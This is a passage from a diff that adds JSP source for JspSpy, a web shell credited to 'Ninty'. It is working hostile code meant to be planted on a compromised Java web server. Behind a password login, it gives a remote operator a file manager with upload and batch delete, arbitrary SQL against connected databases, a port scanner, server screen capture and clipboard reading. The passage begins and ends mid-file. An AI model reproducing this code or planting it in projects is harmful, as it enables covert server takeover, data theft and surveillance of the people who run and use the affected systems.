+if (msg.indexOf("java.lang.ClassNotFoundException") != -1)
+msg = "Can Not Find The Driver!<br/>" + msg;
+out.write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"+align+";font-weight:bold;margin:10px\">"+msg+"</div>");
+}
+}
+private static class UploadBean {
+private String fileName = null;
+private String suffix = null;
+private String savePath = "";
+private ServletInputStream sis = null;
+private byte[] b = new byte[1024];
+public UploadBean() {
+}
+public void setSavePath(String path) {
+this.savePath = path;
+}
+public void parseRequest(HttpServletRequest request) throws IOException {
+sis = request.getInputStream();
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!= -1) {
+s = new String(b, 0, a,PAGE_CHARSET);
+if ((k = s.indexOf("filename=\""))!= -1) {
+s = s.substring(k + 10);
+k = s.indexOf("\"");
+s = s.substring(0, k);
+File tF = new File(s);
+if (tF.isAbsolute()) {
+fileName = tF.getName();
+} else {
+fileName = s;
+}
+k = s.lastIndexOf(".");
+suffix = s.substring(k + 1);
+upload();
+}
+}
+}
+private void upload() {
+try {
+FileOutputStream out = new FileOutputStream(new File(savePath,fileName));
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!=-1) {
+s = new String(b, 0, a);
+if ((k = s.indexOf("Content-Type:"))!=-1) {
+break;
+}
+}
+sis.readLine(b,0,b.length);
+while ((a = sis.readLine(b,0,b.length)) != -1) {
+s = new String(b, 0, a);
+if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
+break;
+}
+out.write(b, 0, a);
+}
+out.close();
+} catch (IOException ioe) {
+ioe.printStackTrace();
+}
+}
+}
+%>
+<%
+SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1);
+String myAbsolutePath = application.getRealPath(request.getServletPath());
+if (Util.isEmpty(myAbsolutePath)) {//for weblogic
+SHELL_NAME = request.getServletPath();
+myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString();
+SHELL_NAME=request.getContextPath()+SHELL_NAME;
+WEB_ROOT = new File(application.getResource("/").getPath()).toString();
+} else {
+WEB_ROOT = application.getRealPath("/");
+}
+SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator)));
+if (session.getAttribute(CURRENT_DIR) == null)
+session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR));
+request = new MyRequest(request);
+if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
+String o = request.getParameter("o");
+if (o != null &&  o.equals("login")) {
+ins.get("login").invoke(request,response,session);
+return;
+} else if (o != null && o.equals("vLogin")) {
+ins.get("vLogin").invoke(request,response,session);
+return;
+} else {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+}
+}
+%>
+<%!
+private static interface Invoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception;
+public boolean doBefore();
+public boolean doAfter();
+}
+private static class DefaultInvoker implements Invoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+}
+public boolean doBefore(){
+return true;
+}
+public boolean doAfter() {
+return true;
+}
+}
+private static class ScriptInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script type=\"text/javascript\">"+
+"	String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};"+
+"	function fso(obj) {"+
+"		this.currentDir = '"+JSession.getAttribute(CURRENT_DIR)+"';"+
+"		this.filename = obj.filename;"+
+"		this.path = obj.path;"+
+"		this.filetype = obj.filetype;"+
+"	};"+
+"	fso.prototype = {"+
+"		copy:function(){"+
+"			var path = prompt('Copy To : ',this.path);"+
+"			if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
+"			doPost({o:'copy',src:this.path,to:path});"+
+"		},"+
+"		move:function() {"+
+"			var path =prompt('Move To : ',this.path);"+
+"			if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
+"			doPost({o:'move',src:this.path,to:path})"+
+"		},"+
+"		vEdit:function() {"+
+"			doPost({o:'vEdit',filepath:this.path})"+
+"		},"+
+"		down:function() {"+
+"			doPost({o:'down',path:this.path})"+
+"		},"+
+"		removedir:function() {"+
+"			if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;"+
+"			doPost({o:'removedir',dir:this.path});"+
+"		},"+
+"		mkdir:function() {"+
+"			var name = prompt('Input New Directory Name','');"+
+"			if (name == null || name.trim().length == 0)return;"+
+"			doPost({o:'mkdir',name:name});"+
+"		},"+
+"		subdir:function() {"+
+"			doPost({o:'filelist',folder:this.path})"+
+"		},"+
+"		parent:function() {"+
+"			var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';"+
+"			doPost({o:'filelist',folder:parent})"+
+"		},"+
+"		createFile:function() {"+
+"			var path = prompt('Input New File Name','');"+
+"			if (path == null || path.trim().length == 0) return;"+
+"			doPost({o:'vCreateFile',filepath:path})"+
+"		},"+
+"		deleteBatch:function() {"+
+"			if (!confirm('Are You Sure To Delete These Files?')) return;"+
+"			var selected = new Array();"+
+"			var inputs = document.getElementsByTagName('input');"+
+"			for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
+"			if (selected.length == 0) {alert('No File Selected');return;}"+
+"			doPost({o:'deleteBatch',files:selected.join(',')})"+
+"		},"+
+"		packBatch:function() {"+
+"			var selected = new Array();"+
+"			var inputs = document.getElementsByTagName('input');"+
+"			for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
+"			if (selected.length == 0) {alert('No File Selected');return;}"+
+"			var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');"+
+"			if (savefilename == null || savefilename.trim().length == 0)return;"+
+"			doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})"+
+"		},"+
+"		pack:function() {"+
+"			var tmpName = '';"+
+"			if (this.filename.indexOf('.') == -1) tmpName = this.filename;"+
+"			else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));"+
+"			tmpName += '.zip';"+
+"			var path = this.path;"+
+"			var name = prompt('Input Target File Name (Only Support Zip)',tmpName);"+
+"			if (name == null || path.trim().length == 0) return;"+
+"			doPost({o:'pack',packedfile:path,savefilename:name})"+
+"		},"+
+"		vEditProperty:function() {"+
+"			var path = this.path;"+
+"			doPost({o:'vEditProperty',filepath:path})"+
+"		},"+
+"		unpack:function() {"+
+"			var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));"+
+"			if (path == null || path.trim().length == 0) return;"+
+"			doPost({o:'unpack',savepath:path,zipfile:this.path})"+
+"		}"+
+"	};"+
+"	function doPost(obj) {"+
+"		var form = document.forms[\"doForm\"];"+
+"		var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}"+
+"		for (var pro in obj)"+
+"		{"+
+"			var input = document.createElement(\"input\");"+
+"			input.type = \"hidden\";"+
+"			input.name = pro;"+
+"			input.value = obj[pro];"+
+"			form.appendChild(input);"+
+"		}"+
+"		form.submit();"+
+"	}"+
+"</script>");	
+
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BeforeInvoker extends  DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<html><head><title>JspSpy Codz By - Ninty</title><style type=\"text/css\">"+
+"body,td{font: 12px Arial,Tahoma;line-height: 16px;}"+
+".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}"+
+".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}"+
+".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}"+
+"a {color: #00f;text-decoration:underline;}"+
+"a:hover{color: #f00;text-decoration:none;}"+
+".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}"+
+".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}"+
+".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}"+
+".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}"+
+".head td span{font-weight:normal;}"+
+"form{margin:0;padding:0;}"+
+"h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}"+
+"ul.info li{margin:0;color:#444;line-height:24px;height:24px;}"+
+"u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}"+
+".secho{height:400px;width:100%;overflow:auto;border:none}"+
+"</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class AfterInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("</body></html>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DeleteBatchInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (!Util.isEmpty(files)) {
+String currentDir = JSession.getAttribute(CURRENT_DIR).toString();
+String[] arr = files.split(",");
+for (String fs:arr) {
+File f = new File(currentDir,fs);
+f.delete();
+}
+}
+JSession.setAttribute(MSG,"Delete Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class ClipBoardInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>"+
+"        <h2>System Clipboard &raquo;</h2>"+
+"<p><pre>");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("</pre>"+
+"          <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\"  />"+
+"        </p>"+
+"      </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VRemoteControlInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script type=\"text/javascript\">"+
+"	var interval = null;"+
+"	function a(btn) {"+
+"		if (btn.value == \"Stop\")"+
+"		{"+
+"			sstopClick(btn);"+
+"		} else {"+
+"			startClick(btn);"+
+"		}"+
+"	}"+
+"	function startClick(btn){"+
+"		btn.value = \"Stop\";"+
+"		var pl = document.getElementById(\"pl\").value;"+
+"		interval = setInterval(function(){"+
+"			var img = document.getElementById(\"screen\");"+
+"			img.src = \""+SHELL_NAME+"?o=gc&rnd=\"+Math.random();"+
+"		},parseInt(pl)*1000);"+
+"	}"+
+"	function sstopClick(btn) {"+
+"		clearInterval(interval);"+
+"		btn.value = \"Start\";"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>"+
+"        <h2>Remote Control &raquo;</h2><input class=\"bt\" onclick=\"var img = document.getElementById('screen').src='"+SHELL_NAME+"?o=gc&rnd='+Math.random();\" name=\"getsc\" id=\"getsc\" value=\"Get Screen\" type=\"button\" size=\"100\"  />"+
+"          <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"a(this)\" value=\"Start\" type=\"button\" size=\"100\"  /> Speed(Second , dont be so fast)  <input type='text' value='3' size='5' id='pl' name='pl'/>  Can Not Control Yet."+
+"        <hr/><p><img id='screen' src='x'/></p>"+
+"      </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//GetScreen
+private static class GcInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Dimension size = Toolkit.getDefaultToolkit().getScreenSize();
+Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight());
+BufferedImage img = new Robot().createScreenCapture(rec);
+response.setContentType("image/jpeg");
+ImageIO.write(img,"jpg",response.getOutputStream());
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VPortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+if (Util.isEmpty(ip))
+ip = "127.0.0.1";
+if (Util.isEmpty(ports))
+ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
+if (Util.isEmpty(timeout)) 
+timeout = "2";
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<h2 id=\"Bin_H2_Title\">PortScan &gt;&gt;</h2>"+
+"<div id=\"YwLB\"><form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<p><input type=\"hidden\" value=\"portScan\" name=\"o\">"+
+"IP : <input name=\"ip\" type=\"text\" value=\""+ip+"\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\""+ports+"\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> Timeout 锛堢锛� : <input name=\"timeout\" type=\"text\" value=\""+timeout+"\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"+
+"</p>"+
+"</form></div>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class PortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+ins.get("vPortScan").invoke(request,response,JSession);
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+int iTimeout = 0;
+if (Util.isEmpty(ip) || Util.isEmpty(ports))
+return;
+if (!Util.isInteger(timeout)) {
+timeout = "2";
+}
+iTimeout = Integer.parseInt(timeout);
+Map<String,String> rs = new LinkedHashMap<String,String>();
+String[] portArr = ports.split(",");
+for (String port:portArr) {
+try {
+Socket s = new Socket();
+s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout);
+s.close();
+rs.put(port,"Open");
+} catch (Exception e) {
+rs.put(port,"Close");
+}
+}
+out.println("<div style='margin:10px'>");
+Set<Map.Entry<String,String>> entrySet = rs.entrySet();
+for (Map.Entry<String,String> e:entrySet) {
+String port = e.getKey();
+String value = e.getValue();
+out.println(ip+" : "+port+" ................................. <font color="+(value.equals("Open")?"green":"red")+"><b>"+value+"</b></font><br>");
+}
+out.println("</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VConnInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object obj = JSession.getAttribute(DBO);
+if (obj == null || !((DBOperator)obj).isValid()) {
+out.println("  <script type=\"text/javascript\">"+
+"	function changeurldriver(){"+
+"		var form = document.forms[\"form1\"];"+
+"		var v = form.elements[\"db\"].value;"+
+"		form.elements[\"url\"].value = v.split(\"`\")[1];"+
+"		form.elements[\"driver\"].value = v.split(\"`\")[0];"+
+"		form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"+
+"<h2>DataBase Manager &raquo;</h2>"+
+"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
+"<p>"+
+"Driver:"+
+"  <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\"  />"+
+"URL:"+
+"<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\"  />"+
+"UID:"+
+"<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\"  />"+
+"PWD:"+
+"<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\"  />"+
+"DataBase:"+
+" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
+" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
+" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
+" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
+" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>"+
+" <option value=' ` '>Other</option>"+
+" </select>"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form></table><script>changeurldriver()</script>");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//DBConnect
+private static class DbcInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String driver = request.getParameter("driver");
+String url = request.getParameter("url");
+String uid = request.getParameter("uid");
+String pwd = request.getParameter("pwd");
+String sql = request.getParameter("sql");
+String selectDb = request.getParameter("selectDb");
+if (selectDb == null)
+selectDb = JSession.getAttribute("selectDb").toString();
+else
+JSession.setAttribute("selectDb",selectDb);
+Object dbo = JSession.getAttribute(DBO);
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+if (dbo != null)
+((DBOperator)dbo).close();
+dbo = new DBOperator(driver,url,uid,pwd,true);
+} else {
+if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) {
+DBOperator oldDbo = (DBOperator)dbo;
+dbo = new DBOperator(driver,url,uid,pwd);
+if (!oldDbo.equals(dbo)) {
+((DBOperator)oldDbo).close();
+((DBOperator)dbo).connect();
+} else {
+dbo = oldDbo;
+}
+}
+} 
+DBOperator Ddbo = (DBOperator)dbo;
+JSession.setAttribute(DBO,Ddbo);
+Util.outMsg(out,"Connect To DataBase Success!");
+out.println("  <script type=\"text/javascript\">"+
+"	function changeurldriver(selectDb){"+
+"		var form = document.forms[\"form1\"];"+
+"		if (selectDb){"+
+"			form.elements[\"db\"].selectedIndex = selectDb"+
+"		}"+
+"		var v = form.elements[\"db\"].value;"+
+"		form.elements[\"url\"].value = v.split(\"`\")[1];"+
+"		form.elements[\"driver\"].value = v.split(\"`\")[0];"+
+"		form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\""+selectDb+"\">"+
+"<h2>DataBase Manager &raquo;</h2>"+
+"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
+"<p>"+
+"Driver:"+
+"  <input class=\"input\" name=\"driver\" value=\""+Ddbo.driver+"\" id=\"driver\" type=\"text\" size=\"35\"  />"+
+"URL:"+
+"<input class=\"input\" name=\"url\" value=\""+Ddbo.url+"\" id=\"url\" value=\"\" type=\"text\" size=\"90\"  />"+
+"UID:"+
+"<input class=\"input\" name=\"uid\" value=\""+Ddbo.uid+"\" id=\"uid\" value=\"\" type=\"text\" size=\"10\"  />"+
+"PWD:"+
+"<input class=\"input\" name=\"pwd\" value=\""+Ddbo.pwd+"\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\"  />"+
+"DataBase:"+
+" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
+" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
+" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
+" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
+" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>"+
+" <option value=' ` '>Other</option>"+
+" </select>"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form><script>changeurldriver('"+selectDb+"')</script>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"POST\">"+
+"<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Run SQL query/queries on database :</td></tr><tr><td><textarea name=\"sql\" class=\"area\" style=\"width:600px;height:50px;overflow:auto;\">"+Util.htmlEncode(Util.getStr(sql))+"</textarea></td><td style=\"padding:0 5px;\"><input class=\"bt\" style=\"height:50px;\" name=\"submit\" type=\"submit\" value=\"Query\" /></td></tr></table></p></form></table>");	
+} catch (Exception e) {
+//e.printStackTrace();
+throw e;
+}
+}
+}
+private static class ExecuteSQLInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String sql = request.getParameter("sql");
+String db = request.getParameter("selectDb");
+Object dbo = JSession.getAttribute(DBO);
+if (!Util.isEmpty(sql)) {
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+response.sendRedirect(SHELL_NAME+"?o=vConn");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+Object obj = ((DBOperator)dbo).execute(sql);
+if (obj instanceof ResultSet) {
+ResultSet rs = (ResultSet)obj;
+ResultSetMetaData meta = rs.getMetaData();
+int colCount = meta.getColumnCount();
+out.println("<div style='padding:10px'><p><b>Query#0 : "+Util.htmlEncode(sql)+"</b></p>");
+out.println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\"><tr class=\"head\">");
+for (int i=1;i<=colCount;i++) {
+out.println("<td nowrap>"+meta.getColumnName(i)+"<br><span>"+meta.getColumnTypeName(i)+"</span></td>");
+}
+out.println("</tr>");
+Table tb = new Table();
+while(rs.next()) {
+Row r = new Row();
+for (int i = 1;i<=colCount;i++) {
+r.addColumn(new Column(rs.getString(i)));
+}
+tb.addRow(r);
+}
+out.println(tb.toString());
+out.println("</table></div>");
+rs.close();
+((DBOperator)dbo).closeStmt();
+} else {
+out.println("<div style='margin:10px'><h2>affected rows : <b>"+obj+"</b></h2></div>");
+}
+}
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VLoginInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<style type=\"text/css\">"+
+"	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"+
+"a{font:11px Verdana;BACKGROUND: #FFFFFF;}"+
+"	</style><form method=\"POST\" action=\""+SHELL_NAME+"\">"+
+"	  <p><span style=\"font:11px Verdana;\">Password: </span>"+
+"        <input name=\"o\" type=\"hidden\" value=\"login\">"+
+"        <input name=\"pw\" type=\"password\" size=\"20\">"+
+"        <input type=\"hidden\" name=\"o\" value=\"login\">"+
+"        <input type=\"submit\" value=\"Login\"><br/><br/>"+
+"	  "+
+"<span style=\"font:11px Verdana;\">Copyright &copy; 2009 NinTy </span><a href=\"http://www.forjj.com\" target=\"_blank\">www.Forjj.com</a></p>"+
+"    </form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class LoginInvoker extends DefaultInvoker{
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String inputPw = request.getParameter("pw");
+if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+} else {
+JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw);
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MyComparator implements Comparator<File>{
+public int compare(File f1,File f2) {
+if (f1 != null && f2!= null) {
+if (f1.isDirectory()) {
+if (f2.isDirectory()) {
+return f1.getName().compareTo(f2.getName());
+} else {
+return -1;
+}
+} else { 
+if (f2.isDirectory()) {
+return 1;
+} else {
+return  f1.getName().compareTo(f2.getName());
+}
+}
+}
+return 0;
+}
+}
+private static class FileListInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("folder");
+if (Util.isEmpty(path))
+path = JSession.getAttribute(CURRENT_DIR).toString();
+
+JSession.setAttribute(CURRENT_DIR,Util.convertPath(path));
+File file = new File(path);
+if (!file.exists()) {
+throw new Exception(path+"Dont Exists !");
+}
+JSession.setAttribute(CURRENT_DIR,path);
+File[] list = file.listFiles();
+Arrays.sort(list,new MyComparator());
+out.println("<div style='margin:10px'>");
+String cr = null;
+try {
+cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3);
+}catch(Exception e) {
+cr = "/";
+}
+File currentRoot = new File(cr);
+out.println("<h2>File Manager - Current disk &quot;"+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"&quot; total "+Util.getSize(currentRoot.getTotalSpace(),'G')+"</h2>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"  <tr>"+
+"    <td nowrap>Current Directory  <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>"+
+"	<td width=\"98%\"><input class=\"input\" name=\"folder\" value=\""+JSession.getAttribute(CURRENT_DIR)+"\" type=\"text\" style=\"width:100%;margin:0 8px;\"></td>"+
+"    <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>"+
+"  </tr>"+
+"</table>"+
+"</form>");
+out.println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"+
+"<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">"+
+"<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" type=\"submit\" /></div>"+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(WEB_ROOT)+"'}).subdir()\">Web Root</a>"+
+" | <a href=\"javascript:new fso({path:'"+Util.convertPath(SHELL_DIR)+"'}).subdir()\">Shell Directory</a>"+
+" | <a href=\"javascript:new fso({}).mkdir()\">New Directory</a> | <a href=\"javascript:new fso({}).createFile()\">New File</a>"+
+" | ");
+File[] roots = file.listRoots();
+for (int i = 0;i<roots.length;i++) {
+File r = roots[i];
+out.println("<a href=\"javascript:new fso({path:'"+Util.convertPath(r.getPath())+"'}).subdir();\">Disk("+Util.convertPath(r.getPath())+")</a>");
+if (i != roots.length -1) {
+out.println("|");
+} 
+}
+out.println("</td>"+
+"</tr></form>"+
+"<tr class=\"head\"><td>&nbsp;</td>"+
+"  <td>Name</td>"+
+"  <td width=\"16%\">Last Modified</td>"+
+"  <td width=\"10%\">Size</td>"+
+"  <td width=\"20%\">Read/Write/Execute</td>"+
+"  <td width=\"22%\">&nbsp;</td>"+
+"</tr>");
+if (file.getParent() != null) {
+out.println("<tr class=alt1>"+
